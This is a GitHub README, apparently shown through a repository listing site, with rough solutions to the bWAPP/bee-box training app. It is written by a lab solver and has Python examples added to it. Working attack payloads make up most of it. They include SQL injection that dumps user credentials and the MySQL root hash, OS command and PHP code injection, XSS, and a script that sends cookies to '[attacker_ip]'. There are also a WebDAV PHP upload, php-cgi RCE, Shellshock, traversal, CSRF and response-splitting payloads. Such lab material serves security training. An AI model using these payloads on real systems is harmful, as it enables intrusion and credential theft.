Ecosyste.ms: Awesome
https://github.com/skiptomyliu/solutions-bwapp
In progress rough solutions to bWAPP / bee-box
- Host: GitHub
- URL: https://github.com/skiptomyliu/solutions-bwapp
- Owner: skiptomyliu
- Created: 2015-07-18T18:58:01.000Z (over 9 years ago)
- Default Branch: master
- Last Pushed: 2020-01-07T16:15:57.000Z (almost 5 years ago)
- Last Synced: 2023-11-07T18:57:10.795Z (12 months ago)
- Topics: appsec, bwapp, csrf, directory-traversal, html-injection, sql-injection, xpath-injection, xss
- Language: HTML
- Size: 979 KB
- Stars: 167
- Watchers: 4
- Forks: 58
- Open Issues: 2
Metadata Files:
- Readme: README.md
README
# solutions-bwapp
In progress rough solutions. This is not a comprehensive solution list. Updating whenever I have the time.

Ref sheet: http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

# Contributors
[@mmmds](https://github.com/mmmds)

# A1 - Injection
### HTML Injection - Reflected (GET)
htmli_get.php
```
/bWAPP/htmli_get.php?firstname=%3Ch1%3EHello%3C%2Fh1%3E&lastname=%3Ch2%3EWorld%3C%2Fh2%3E&form=submit
```
### HTML Injection - Reflected (POST)
Same two tags as the GET variant, submitted in the form fields:
```
<h1>Hello</h1>
<h2>World</h2>
```

### HTML Injection - Reflected (URL)
XXX: Todo, IE only?
```
/bWAPP/htmli_current_url.php
```

### HTML Injection - Stored (Blog)
Following solution taken from:
http://penthusiasts.blogspot.com/2013/12/bwapp-html-injection-all.html

The stored entry is a fake login form that posts to the attacker's machine; to the victim it renders as:
```
Please login with valid credentials:
Username:
Password:
```
Attacker's machine, catching the submitted credentials:
```
nc -l 80
```
```

### iFrame Injection
```
ParamUrl=robots.txt" onload="alert(1)
ParamHeight=">alert(1);
```

### OS Command Injection
```
www.nsa.gov; cat /etc/passwd
www.nsa.gov & cat /etc/passwd
www.nsa.gov | cat /etc/passwd
```

### OS Command Injection - Blind
```
www.nsa.gov | sleep 10
```

### PHP Code Injection
```
/bWAPP/phpi.php?message=a;echo "what"; $fp = fopen("/etc/passwd","r");$result = fread($fp,8192); echo $result
```
### Server-Side Includes
### SQL Injection (GET/SEARCH)
```
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
```

### SQL Injection (GET/SELECT)
```
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
```
![](https://github.com/skiptomyliu/solutions-bwapp/blob/master/screenshots/sqli_2_1.png)
![](https://github.com/skiptomyliu/solutions-bwapp/blob/master/screenshots/sqli_2_2.png)

### SQL Injection (POST/Search)
/bWAPP/sqli_6.php
```
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
```

### SQL Injection (POST/Select)
Use Burp
```
movie=1 UNION ALL SELECT table_schema, table_name, null, null, null, null, null FROM information_schema.tables LIMIT 1 OFFSET 1;--
```

### SQL Injection (AJAX/JSON/jQuery)
Use Burp
```
a%' UNION ALL SELECT table_schema,table_name, null, null, null, null, null from information_schema.tables;--
```
![](https://github.com/skiptomyliu/solutions-bwapp/blob/master/screenshots/sqli_10_1.png)
Then list the columns of the users table and dump it:
```
a%' UNION ALL SELECT 1, column_name, null, null, null, null, null from information_schema.columns where table_name="users";--
blah%' union all select 1,login,password,email,secret,1, 1 from users --
```
### SQL Injection (Login Form/Hero)
```
ok' or 1=1--
```
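An added example, not the repository's code, that reproduces the UNION enumeration from the search sections above and the tautology login bypass, against an in-memory SQLite database standing in for bee-box's MySQL. The schema, the rows, the shape of the application's query and the function names are all assumptions; the bound-parameter version sits beside the vulnerable one.

```python
import sqlite3

# Added example, not the repository's code. An in-memory SQLite database stands
# in for bee-box's MySQL; the schema and rows below are constructed, with seven
# movie columns so the page's seven-column UNION payloads line up.
SCHEMA = """
CREATE TABLE movies(id INTEGER, title TEXT, release_year TEXT, genre TEXT,
                    main_character TEXT, imdb TEXT, tickets_stock INTEGER);
CREATE TABLE users(id INTEGER, login TEXT, password TEXT, email TEXT, secret TEXT);
INSERT INTO movies VALUES(1, 'Iron Man', '2008', 'action', 'Tony Stark', 'tt0371746', 53);
INSERT INTO movies VALUES(2, 'The Cabin in the Woods', '2011', 'horror', 'Some guy', 'tt1259521', 12);
INSERT INTO users VALUES(1, 'bee', 'sha1-of-bug', 'bee@example.invalid', 'A bee');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    # Assumed shape of the search page's query: the term is concatenated into a
    # LIKE pattern, which is why the payloads start with a%' and end with --.
    sql = f"SELECT * FROM movies WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_hardened(conn, term):
    # Bound parameter: the same payload is matched as literal text, never parsed.
    return conn.execute("SELECT * FROM movies WHERE title LIKE ?",
                        ("%" + term + "%",)).fetchall()


def login_vulnerable(conn, login, password):
    # Same defect as the login form: ok' or 1=1-- turns the WHERE into a tautology.
    sql = f"SELECT login FROM users WHERE login = '{login}' AND password = '{password}'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def count_columns(conn, max_cols=20):
    # ORDER BY n errors once n exceeds the column count of the original SELECT;
    # that is how you learn how many NULLs the UNION needs.
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(conn, f"a%' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_payload(*exprs, columns, from_clause=""):
    # Pads the attacker's SELECT with NULLs up to `columns` and comments out the
    # trailing %' the application appends. The space after -- keeps the payload
    # valid for MySQL, which requires it; SQLite does not care.
    exprs = list(exprs) + ["NULL"] * (columns - len(exprs))
    return f"a%' UNION ALL SELECT {', '.join(exprs)} {from_clause} -- "


def titles(rows):
    # Column 2 is where the UNION's second expression lands (the movie title).
    return [row[1] for row in rows]


def demo():
    conn = make_db()
    cols = count_columns(conn)
    version = titles(search_vulnerable(conn, union_payload("1", "sqlite_version()", columns=cols)))
    # sqlite_master plays the role of MySQL's information_schema.tables here.
    tables = titles(search_vulnerable(conn, union_payload(
        "1", "name", columns=cols, from_clause="FROM sqlite_master WHERE type='table'")))
    creds = [(row[1], row[2]) for row in search_vulnerable(conn, union_payload(
        "id", "login", "password", "email", "secret", columns=cols, from_clause="FROM users"))]
    return {
        "columns": cols,
        "version_leaked": sqlite3.sqlite_version in version,
        "tables": tables,
        "creds": creds,
        "login_bypass": login_vulnerable(conn, "ok' or 1=1--", "anything"),
        "hardened_rows": search_hardened(conn, union_payload("1", "sqlite_version()", columns=cols)),
    }
```

`count_columns` answers why the page's payloads carry exactly five NULLs: the movies SELECT returns seven columns, and the UNION must match. On MySQL, swap `sqlite_master` for `information_schema.tables` as the page does, and keep the space after `--`.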
### SQL Injection (SQLite)
```
a%' UNION ALL SELECT 1,sqlite_version(),1,1,1,1; --
```

### SQL Injection - Stored (Blog)
Be sure to add a space after the -- for this one: MySQL only treats -- as a comment when it is followed by whitespace, so without the space the injection will not work.
```
asdf',(SELECT database() ))--
```
To begin enumerating tables:
```
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 0,1 ))--
asdf',(SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = 'bWAPP' LIMIT 1,1 ))--
```
Then pull the MySQL root password hash from mysql.user:
```
asdf',(select password from mysql.user where user='root' ))--
```

### XML/XPath Injection (Login Form)
```
password=' or id='2
```

### XML/XPath Injection (Search)
```
genre=')]/password | a[contains(a,'
genre=') or contains(genre, '
genre=') or not(contains(genre, 'xxx') and '1'='2
```

# A2 - Broken Authentication
### Broken Auth. - CAPTCHA Bypassing
Using Burp, block the page's request to captcha_box.php: that script is what sets the server-side session variable $_SESSION["captcha"], which ba_captcha_bypass.php then checks the answer against. With no captcha in the session there is nothing to check.
The second requirement is to keep captcha_user from being submitted by the client at all. Remove it from the POST body in Burp:
```
POST /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bepp:8088/bWAPP/ba_captcha_bypass.php
Cookie: PHPSESSID=67a6abb1d7ff40c55ad50d3aa43fc7c4; security_level=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

login=bee&password=bug&form=submit
```

### Broken Auth. - Logout Management
Open a second tab and log out there. The other tab still has a working session.

### Session Mgmt. - Administrative Portals
In URL and Cookies
```
admin=1
```

# A3 - Cross-Site Scripting (XSS)
### XSS - Reflected (GET)
xss_get.php
```
alert(document.cookie)
```

### XSS - Reflected (POST)
xss_post.php
```
alert(document.cookie)
```

### XSS - Reflected (JSON)
xss_json.php
```
"}]}';prompt(0)
```

### XSS - Reflected (AJAX/JSON)
xss_ajax_2-1.php
### XSS - Reflected (AJAX/XML)
xss_ajax_1-1.php
```
<img src='#' onerror='alert(1)'>
```
Alternatively, I was able to get XSS to execute on the AJAX page that is called:
```
xss_ajax_1-2.php?title=prompt(0)
```

### XSS - Reflected (Back Button)
Modify Referer header field
```
Referer: ';alert(1);'
```

### XSS - Reflected (Custom Header)
Add header field
```
bWAPP: alert(1)
```

### XSS - Reflected (Eval)
```
date=alert(1)
```

### XSS - Reflected (HREF)
```
Referer: alert(1)
```

### XSS - Reflected (User-Agent)
```
User-Agent: alert(1)
```

# A4 - Insecure Direct Object References
### Insecure DOR (Change Secret)
Use Burp to unhide hidden fields or intercept the POST param.

### Insecure DOR (Reset Secret)
Change 'login' and 'secret' field to arbitrary values.
```
POST /bWAPP/xxe-2.php HTTP/1.1
Host: bepp:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=UTF-8
Referer: http://bepp:8088/bWAPP/insecure_direct_object_ref_3.php
Content-Length: 59
Cookie: PHPSESSID=77aa634b546d1c78d5afc16aae328172; security_level=0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<reset><login>bee</login><secret>Any bugs?</secret></reset>
```

### Insecure DOR (Order Tickets)
bWAPP/insecure_direct_object_ref_2.php
Use Burp to unhide the hidden ticket price field, or modify the POST param in the proxy while it is in transit.
# A5 - Security Misconfiguration
### Cross-Origin Resource Sharing (AJAX)
It's possible because of this header in the response:
```
Access-Control-Allow-Origin: *
```
```
function steal() {
  var r = new XMLHttpRequest();
  r.onreadystatechange = function() {
    if (r.readyState == 4 && r.status == 200) {
      // Readable from another origin only because of the wildcard ACAO header
      alert(r.responseText);
    }
  };
  r.open("GET", "http://192.168.1.10/bWAPP/secret-cors-1.php", true);
  r.send();
}
```
Note that the wildcard cannot be combined with credentials: a browser rejects an `Access-Control-Allow-Origin: *` response for a request sent with `withCredentials`, so this reads whatever secret-cors-1.php serves to a request that carries no bWAPP session cookie.
### Cross-Site Tracing (XST)
Doesn't work in modern browsers: TRACE is a forbidden method for XMLHttpRequest and fetch, so the request never leaves the browser. Maybe use phantomJS?
I modified the POC to use GET instead of TRACE. Additional changes from the original xst.js include making the onreadystatechange handler NOT inline (seems to play better with FF).
1. Start listener on attacking machine: nc -l 8888
2. Modify xst.js to match your environment:
```
var xmlhttp;
// Code for IE7+, Firefox, Chrome, Opera, Safari
if (window.XMLHttpRequest) {
  xmlhttp = new XMLHttpRequest();
}
// Code for IE6, IE5
else {
  xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
}

xmlhttp.onreadystatechange = foo;

function foo() {
  if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
    var xmlResp = xmlhttp.responseText;
    // document.getElementById("response").innerHTML = xmlResp;
    alert(xmlResp);
    // Send the cookie to the listener started in step 1
    document.location = "http://[attacker_ip]:8888/grab.cgi?" + document.cookie;
  }
}

// xmlhttp.open("TRACE", "/bWAPP/", true);  // refused by modern browsers
xmlhttp.open("GET", "/bWAPP/", true);
// xmlhttp.withCredentials = true;
xmlhttp.send();
```

### Insecure FTP Configuration
Anonymous login with write permissions is enabled:
```
$ ftp 192.168.1.9
Connected to 192.168.1.9.
220 ProFTPD 1.3.1 Server (bee-box) [192.168.1.9]
Name (192.168.1.9:dean): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||42936|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 root www-data 543803 Nov 2 2014 Iron_Man.pdf
-rw-rw-r-- 1 root www-data 462949 Nov 2 2014 Terminator_Salvation.pdf
-rw-rw-r-- 1 root www-data 544600 Nov 2 2014 The_Amazing_Spider-Man.pdf
-rw-rw-r-- 1 root www-data 526187 Nov 2 2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r-- 1 root www-data 756522 Nov 2 2014 The_Dark_Knight_Rises.pdf
-rw-rw-r-- 1 root www-data 618117 Nov 2 2014 The_Incredible_Hulk.pdf
-rw-rw-r-- 1 root www-data 5010042 Nov 2 2014 bWAPP_intro.pdf
226 Transfer complete
ftp> puts test.txt
?Invalid command.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||28299|)
150 Opening BINARY mode data connection for test.txt
0 0.00 KiB/s
226 Transfer complete
ftp> ^D
221 Goodbye.
```

### Insecure SNMP Configuration
Default community strings are set on the machine
```
$ snmpwalk -v2c -c private bwapp-server
$ snmpwalk -v2c -c public bwapp-server
```

### Insecure WebDAV Configuration
PUT is allowed, so an arbitrary .php file can be dropped into the share:
```
curl -X PUT --data '' 'http://192.168.1.10/webdav/attack.php'
```

# A6 - Sensitive Data Exposure
### Base64 Encoding (Secret)
Use Burp to get cookie
![](https://github.com/skiptomyliu/solutions-bwapp/blob/master/screenshots/insecure_crypt_storage_3.png)
### Heartbleed Vulnerability
Use the heartbleed.py script found in the /evil directory
```
python heartbleed.py [ip]
```

# A7 - Missing Functional Level Access Control
### Directory Traversal - Directories
directory_traversal_2.php
```
/bWAPP/directory_traversal_2.php?directory=../../../../home/
```

### Directory Traversal - Files
directory_traversal_1.php
```
/bWAPP/directory_traversal_1.php?page=../../../../../etc/passwd
```

### Host Header Attack (Cache Poisoning)
hostheader_1.php
![](https://github.com/skiptomyliu/solutions-bwapp/blob/master/screenshots/hostheader_1_1.png)
### Host Header Attack (Reset Poisoning)
hostheader_2.php
### Remote & Local File Inclusion (RFI/LFI)
Copy rfi.txt to rfi.php: the vulnerable include appends the .php suffix to whatever name is supplied, so ../evil/rfi becomes ../evil/rfi.php.
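Before the payload, an added example (mine, not the repository's) of the defect behind both Directory Traversal sections above and this RFI/LFI one, with a hardened resolver beside each. `DOC_ROOT`, `LANGUAGES` and the function names are assumptions standing in for bee-box's documents directory and rlfi.php's language pages.

```python
import posixpath

# Added example, not bWAPP code. DOC_ROOT and LANGUAGES are constructed
# stand-ins for the documents directory behind directory_traversal_*.php and
# the language pages behind rlfi.php.
DOC_ROOT = "/var/www/bWAPP/documents"
LANGUAGES = {"lang_en", "lang_fr", "lang_nl"}


def resolve_vulnerable(base, user_path):
    # Unchecked join, as in the traversal pages: each ../ walks one level up,
    # and enough of them reach /etc/passwd or /home regardless of base.
    return posixpath.normpath(posixpath.join(base, user_path))


def resolve_hardened(base, user_path):
    # Normalise, then insist the result is still strictly inside base.
    # Absolute input, ../ escapes and the empty name are all refused.
    base = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    if user_path.startswith("/") or not candidate.startswith(base + "/"):
        raise ValueError(f"path escapes {base}: {user_path!r}")
    return candidate


def include_vulnerable(language):
    # The behaviour the page observed: suffix appended, nothing else checked.
    return f"{language}.php"


def include_hardened(language):
    # rlfi.php-style include. Appending ".php" is not a control, since
    # ../evil/rfi simply becomes ../evil/rfi.php. An allowlist of page names is.
    if language not in LANGUAGES:
        raise ValueError(f"unknown language {language!r}")
    return f"{language}.php"
```

On a real filesystem, resolve with `os.path.realpath` before the prefix check so symlinks inside the directory cannot point back out of it. The rlfi.php payload itself: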
```
bWAPP/rlfi.php?language=../evil/rfi
```

### Restrict Device Access
Modify request
```
User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
```

# A8 - Cross-Site Request Forgery (CSRF)
Reference the HTML files in the resources directory. You can modify these to auto-execute in a hidden iframe as an exercise. If bWAPP had CSRF mitigations (such as a per-session token checked on every state-changing POST), the requests made from the csrf_x.html files would be answered with forbidden.
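As an added example (not the repository's csrf_x.html files), the hidden-iframe exercise written as Python that emits the attacker page, next to the per-session token check that bWAPP is missing. The target URL and the form field names are assumptions standing in for the change-password form.

```python
import hmac
import secrets
from html import escape

# Added example, not the repository's csrf_x.html. The action URL and the
# field names are assumptions standing in for bWAPP's change-password form.
TARGET = "http://192.168.1.10/bWAPP/csrf_1.php"
FIELDS = {"password_new": "pwned", "password_conf": "pwned", "action": "change"}


def csrf_page(action, fields):
    # Attacker page: a form pre-filled with the request the victim would never
    # send on purpose, auto-submitted into a hidden iframe so nothing is shown.
    # The browser attaches the victim's bWAPP cookie to the cross-site POST.
    inputs = "\n".join(
        f'  <input type="hidden" name="{escape(k, quote=True)}" value="{escape(v, quote=True)}">'
        for k, v in fields.items()
    )
    return (
        "<!doctype html>\n"
        '<iframe name="sink" style="display:none"></iframe>\n'
        f'<form id="f" method="POST" action="{escape(action, quote=True)}" target="sink">\n'
        f"{inputs}\n"
        "</form>\n"
        '<script>document.getElementById("f").submit();</script>\n'
    )


def issue_token(session):
    # Server side: one unguessable token per session, embedded in legitimate forms.
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def verify_token(session, submitted):
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def change_password(session, form):
    # The check bWAPP lacks: an attacker page cannot read the victim's token
    # (same-origin policy), so its forged POST arrives without it and gets 403.
    if not verify_token(session, form.get("token")):
        return 403
    return 200
```

Besides the token, issuing the session cookie with `SameSite=Lax` or `Strict` stops the browser from attaching it to a cross-site POST in the first place.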
### Cross-Site Request Forgery (Change Password)
Please reference [csrf_1.html](resources/csrf_1.html). Replace the address within the HTML with your own bWAPP server and run the form to change the password. If CSRF tokens were utilized, the server should return forbidden.

### Cross-Site Request Forgery (Change Secret)
Please reference [csrf_2.html](resources/csrf_2.html). Again, replace the address within the HTML with your own bWAPP server to change the secret.

### Cross-Site Request Forgery (Transfer Amount)
Please reference [csrf_3.html](resources/csrf_3.html). Again, replace the address within the HTML with your own bWAPP server to transfer an amount.

# A9 - Using Known Vulnerable Components
### PHP CGI Remote Code Execution
php-cgi argument injection (CVE-2012-1823): the query string is handed to php-cgi as command-line options, so -d allow_url_include=1 -d auto_prepend_file=php://input makes it run the POST body as PHP.
```
POST /bWAPP/admin/phpinfo.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.1.20
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 70
Cookie: security_level=0; PHPSESSID=e27e4148fbb0b82028e1cd6e159f4e7a
Connection: close
```
The POST body (70 bytes in this capture) is the PHP code to run; php-cgi prepends php://input and executes it.
There is also the possibility to display the source code with -s:
```
http://192.168.1.20/bWAPP/admin/phpinfo.php?-s
```

### Shellshock Vulnerability (CGI)
Add a crafted Referer header to the request for /bWAPP/cgi-bin/shellshock.sh:
```
Referer: () { nothing;}; /bin/touch /tmp/malicious
```
```
Referer: () { nothing;}; echo; /bin/cat /etc/passwd
```

# Other bugs...
### HTTP Parameter Pollution
Submit as the name:
```
bee&movie=1
```
then every link will choose the G.I. Joe: Retaliation movie.

### HTTP Response Splitting
```
http://192.168.1.20/bWAPP/http_response_splitting.php?url=http://itsecgames.blogspot.com%0AReferer%3agoogle.com
```
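An added example, not bWAPP's http_response_splitting.php, that runs the payload above through a constructed stand-in for a PHP redirect doing `header("Location: " . $_GET["url"])`, once without validation and once hardened, and goes one step beyond the page by showing a full split that produces a second, attacker-written response. `ALLOWED_HOSTS`, `SPLIT_PAYLOAD` and the function names are assumptions.

```python
from urllib.parse import unquote, urlsplit

# Added example, not bWAPP's http_response_splitting.php. The builders below are
# constructed stand-ins for a PHP redirect doing header("Location: " . $_GET["url"])
# with and without validation; ALLOWED_HOSTS is an assumption.
ALLOWED_HOSTS = {"itsecgames.blogspot.com"}
PAGE_PAYLOAD = "http://itsecgames.blogspot.com%0AReferer%3agoogle.com"
# Constructed: a second complete response smuggled in after the Location header.
SPLIT_PAYLOAD = (
    "http://itsecgames.blogspot.com%0D%0AContent-Length:%200%0D%0A%0D%0A"
    "HTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%2021%0D%0A%0D%0A"
    "%3Chtml%3Epoisoned%3C/html%3E"
)


def redirect_vulnerable(url):
    # The decoded url goes straight into the header line; any CR/LF it carries
    # ends the Location header and starts attacker-written ones.
    return f"HTTP/1.1 302 Found\r\nLocation: {url}\r\nContent-Length: 0\r\n\r\n"


def redirect_hardened(url):
    # Refuse control characters first (that kills the injection), then enforce a
    # target allowlist, which also closes the open redirect.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in url):
        raise ValueError("control character in header value")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        raise ValueError(f"redirect target not allowed: {url!r}")
    return f"HTTP/1.1 302 Found\r\nLocation: {url}\r\nContent-Length: 0\r\n\r\n"


def parse_headers(raw):
    # Lenient, browser/proxy-style parsing: a bare LF also ends a header line,
    # which is why the page's %0A-only payload is enough.
    text = raw.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return lines[0], headers


def count_responses(raw):
    # Full "splitting": a second status line inside the body means a caching
    # proxy may store the attacker's response under the victim's request.
    text = raw.replace("\r\n", "\n")
    return sum(1 for line in text.split("\n") if line.startswith("HTTP/1."))


def demo(payload):
    # Run one URL-encoded payload through the vulnerable redirect, as PHP would
    # see it after the web server decodes the query string.
    raw = redirect_vulnerable(unquote(payload))
    status, headers = parse_headers(raw)
    return status, headers, count_responses(raw)
```

The page's payload only adds a Referer header; `SPLIT_PAYLOAD` shows why the bug is named splitting, and why it matters for the Host Header (Cache Poisoning) section above as well.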